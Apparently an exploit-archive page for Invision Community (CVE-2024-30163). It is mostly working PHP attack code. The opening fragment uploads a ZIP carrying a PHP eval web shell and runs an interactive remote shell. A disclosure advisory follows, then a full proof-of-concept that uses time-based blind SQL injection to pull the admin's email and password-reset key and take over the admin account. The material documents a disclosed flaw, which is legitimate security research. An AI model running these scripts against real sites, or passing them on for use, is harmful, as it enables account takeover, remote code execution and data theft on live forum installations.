curl_init();@unlink('./cookies.txt');curl_setopt($ch, CURLOPT_HEADER, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');print "[+] Logging into AdminCP\n";curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login");curl_setopt($ch, CURLOPT_POST, false);if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword");if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n");print "[+] Uploading malicious ZIP file\n";curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin");curl_setopt($ch, CURLOPT_POST, false);if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");$plg = md5(time()).".zip";@file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA="));$params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)];curl_setopt($ch, CURLOPT_POSTFIELDS, $params);if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n");print "[+] Launching shell\n";curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/");curl_setopt($ch, CURLOPT_POST, false);$phpcode = "print '____'; passthru(base64_decode('%s')); print '____';";while(1){  print "\ninvision-shell# ";  if (($cmd = trim(fgets(STDIN))) == "exit") break;  curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]);  preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");}

Invision Community 4.7.16 Remote Code Execution

Invision Community versions 4.4.0 through 4.7.15 suffer from a remote SQL injection vulnerability in store.php.

--------------------------------------------------------------------  
Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability  
--------------------------------------------------------------------

[-] Software Link:

https://invisioncommunity.com

[-] Affected Versions:

All versions from 4.4.0 to 4.7.15.

[-] Vulnerability Description:

The vulnerability is located in the  
/applications/nexus/modules/front/store/store.php script.  
Specifically, into the  
IPS\nexus\modules\front\store\_store::_categoryView() method:

126 /* Apply Filters */  
127 if ( isset( \IPS\Request::i()->filter ) and \is_array(  
\IPS\Request::i()->filter ) )  
128 {  
129 $url = $url->setQueryString( 'filter', \IPS\Request::i()->filter );  
130 foreach ( \IPS\Request::i()->filter as $filterId => $allowedValues )  
131 {  
132 $where[] = array( \IPS\Db::i()->findInSet(  
"filter{$filterId}.pfm_values", array_map( 'intval', explode( ',',  
$allowedValues ) ) ) );  
133 $joins[] = array( 'table' => array( 'nexus_package_filters_map',  
"filter{$filterId}" ), 'on' => array(  
"filter{$filterId}.pfm_package=p_id AND  
filter{$filterId}.pfm_filter=?", $filterId ) );  
134 }  
135 }

User input passed through the "filter" request parameter is not  
properly sanitized before being  
assigned to the $where and $joins variables (lines 132 and 133), which  
are later used to execute  
some SQL queries. This can be exploited by unauthenticated attackers  
to carry out time-based or  
error-based Blind SQL Injection attacks. Subsequently, this might also  
be exploited to reset  
users' passwords and gain unauthorized access to the AdminCP, in order  
to achieve  
Remote Code Execution (RCE). Successful exploitation of this  
vulnerability requires  
the nexus application to be installed and configured with one "Product  
Group" at least.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2024-30163.php

[-] Solution:

Upgrade to version 4.7.16 or later.

[-] Disclosure Timeline:

[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure  
[12/03/2024] - Version 4.7.16 released  
[20/03/2024] - CVE identifier requested  
[24/03/2024] - CVE identifier assigned  
[05/04/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2024-30163 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://invisioncommunity.com/release-notes/4716-r128/  
https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-02

-----------------------  
PoC:

<?php

/*  
    --------------------------------------------------------------------  
    Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability  
    --------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX  
    mail................: n0b0d13s[at]gmail[dot]com  
    software link.......: https://invisioncommunity.com

    +-------------------------------------------------------------------------+  
    | This proof of concept code was written for educational purpose only.    |  
    | Use it at your own risk. Author will be not responsible for any damage. |  
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    The vulnerability is located in the /applications/nexus/modules/front/store/store.php script.  
    Specifically, into the IPS\nexus\modules\front\store\_store::_categoryView() method: user  
    input passed through the "filter" request parameter is not properly sanitized before being  
    assigned to the $where and $joins variables, which are later used to execute some SQL  
    queries. This can be exploited by unauthenticated attackers to carry out time-based  
    or error-based SQL Injection attacks.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2024-02  
*/

set_time_limit(0);  
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");

$url = $argv[1];  
$ch  = curl_init();  
$sec = 3; // number of seconds for SLEEP(): less seconds, less accurate

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/store/");

function sql_injection($sql)  
{  
  global $ch, $sec;

  $min = true;  
  $idx = 1;

  while(1)  
  {  
    $test = 256;

    for ($i = 7; $i >= 0; $i--)  
    {  
      $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));  
      $injection = "` ON 1 UNION SELECT IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},1,SLEEP({$sec})) OR ?=?#";  
      curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf("cat=1&filter[%s]=1", rawurlencode($injection)));  
      $start = time(); curl_exec($ch); $secs = time() - $start;  
      $min = ($secs < $sec);  
    }

    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;  
    $data .= chr($chr); $min = true; $idx++;  
    print "\r[*] Data: {$data}";  
  }

  return $data;  
}

print "[+] Step 1: fetching admin's e-mail address\n";

$email = sql_injection("SELECT email FROM core_members WHERE member_id=1");

print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";

fgets(STDIN);

print "[+] Step 3: fetching the password reset key\n";

$vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");

print "\n[+] Step 4: taking over the admin account by resetting their password\n";

@unlink('./cookies.txt');

curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");  
curl_setopt($ch, CURLOPT_POST, false);  
curl_setopt($ch, CURLOPT_HEADER, true);  
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');

if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");

$passwd = md5(time());  
$params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";

curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");

print "[+] Done! You can log into the AdminCP with {$email}:{$passwd}\n";

Tag

#ssl